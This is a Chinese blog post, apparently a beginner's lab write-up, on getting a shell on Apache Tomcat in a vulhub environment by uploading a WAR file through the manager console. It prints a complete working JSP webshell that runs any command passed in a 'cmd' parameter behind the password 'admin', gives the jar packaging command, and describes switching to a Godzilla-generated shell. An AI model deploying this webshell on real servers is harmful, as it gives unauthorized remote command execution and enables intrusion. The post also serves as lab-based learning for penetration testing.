Tomcat后台部署war木马getshell

昨儿个面试被问到如何通过tomcat拿shell,之前只是看到,没做过复现,导致自己吃了亏,刚入渗透不久。复现的漏洞太少,经验方面还是远远不够的,一点一点来。复现过程可能比较粗糙,有什么错误还希望各位大哥给小弟指点一番。

靶场搭建:
百度一下,vulhub里边就有
漏洞复现:
进入靶场,找到后台。默认的话是在manager
在这里插入图片描述

在这里插入图片描述

准备好马,打包成war包

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>

    <body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>
//ps:马的出处:https://blog.csdn.net/Jerry____/article/details/103387763

执行:jar -cvf [war包名称].war 打包目录
在这里插入图片描述

a.jsp 的话是一句话木马,大家需要的话,可以自己找一下一些有用的马(我找的这个马不好用,就不做记录了)
在这里插入图片描述

上传,部署war包

在这里插入图片描述

可以看到应用列表已经出现了我们的目录:

在这里插入图片描述

访问一下:whoami 成功回显,漏洞复现算是成功了。
在这里插入图片描述

在这里插入图片描述

有些命令是回显不了的,大概是马不太行。

用哥斯拉生成了一个jsp一句话,重新部署,成功连接,拿到shell

在这里插入图片描述

  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值